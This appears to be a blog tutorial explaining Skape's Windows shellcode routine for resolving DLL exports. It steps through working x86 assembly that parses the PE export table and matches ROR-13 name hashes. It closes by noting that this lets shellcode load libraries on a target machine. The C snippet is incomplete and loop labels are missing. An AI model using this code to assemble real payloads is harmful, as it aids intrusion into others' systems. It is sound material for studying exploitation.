Having read and understood Skapes paper on Windows shellcode I thought I’d better provide yet another explanation on how it works. Yesterday I explained finding kernel32.dll so today I will explain Skapes method of resolving symbols inside a dll.

Over at OpenRCE you can find a very useful PDF describing the structure of a PE file but I have drawn a diagram showing only the necessary elements:

finding exported functions

 All addresses inside the PE file are relative to the base address…​they are NOT absolute.

Skapes 'find_function' function takes two arguments. The first being the base address of the dll to search and the second being a hash code of the name to find. Thus the stack upon entering the function looks like this:

find function initial stack

First instruction (pushad) saves the value of all general purpose registers and a couple of others after which the stack looks like this:

stack in find function

Stack layout after having executed the 'pushad' instruction

The code begins by saving the registers and finding the export table (IMAGE_EXPORT_DIRECTORY). This is accomplished by the following instructions:

pushad                       ;Save registers
mov  ebp, [esp + 0x24]       ;Put first argument (dll base) into ebp
mov  eax, [ebp + 0x3c]       ;Put offset of PE header into eax
mov  edx, [ebp + eax + 0x78] ;Put offset of export directory into edx
add  edx, ebp                ;Offset + base = absolute address

Now EDX contains the absolute address in memory for the IMAGE_EXPORTS_DIRECTORY structure. Next the number of names is put into ECX and the address of the names address table into EBX:

mov   ecx, [edx + 0x18]  ;Number of names
mov   ebx, [edx + 0x20]  ;Offset of names table
add   ebx, ebp           ;Adding EBP makes address absolute

Now ECX contains the number of exported symbols and EBX contains the address of the array of name offsets. Now we enter a loop which iterates backward through all exported names, hashing each name and comparing it to the requested value.

A C version of the hashing algorithm would look like this:

#define ROR(v,n) (((v)>>((n)%32))|((v)<<(32-((n)%32))))
char * name = "LoadLibraryA";
unsigned int hash = 0;
while (*name) {
    hash = ROR(hash, 13) + *name;

The code goes like this:

jecxz find_function_finished ;No more names, go to end
dec   ecx                    ;Decrement ECX
mov   esi, [ebx + ecx * 4]   ;Offset of next exported name
add   esi, ebp               ;Make it absolute

xor   edi, edi               ;EDI will contain calculated hash
xor   eax, eax               ;AL will contain character...zero top bits
cld                          ;Make lodsb increment esi

lodsb                        ;Put char at ESI into AL and increment ESI
test  al, al                 ;Reached end of string ?
jz    compute_hash_finished  ;Yes we did
                             ;End hashing and start comparing
ror   edi, 0xd               ;Right shift 13 bits
add   edi, eax               ;Add character
jmp   compute_hash_again     ;Again with next character

cmp   edi, [esp + 0x28]      ;Compare computed hash with second arg
jnz   find_function_loop     ;Not equal...try next name

mov   ebx, [edx + 0x24]      ;Found! Put offset of ordinals into EBX
add   ebx, ebp               ;Make it absolute
mov   cx, [ebx + 2 * ecx]    ;Put ordinal in CX
                             ;ECX contains index of name which
                             ;corresponds to the index into the ordinal
                             ;table. Each ordinal is two bytes long

mov   ebx, [edx + 0x1c]      ;Put offset of function table into EBX
add   ebx, ebp               ;Make it absolute
mov   eax, [ebx + 4 * ecx]   ;Use ordinal as index into function table
                             ;and put offset of function into EAX
add   eax, ebp               ;Make it absolute

mov   [esp + 0x1c], eax      ;Overwrite the saved EAX register
                             ;with the found address

popad                        ;Restore registers
ret                          ;Return with EAX=absolute address of function

The code is pretty clear when you can visualize the structures. With these two shellcodes you can build more or less anything since you can load any library on the target machine and utilize its functionality.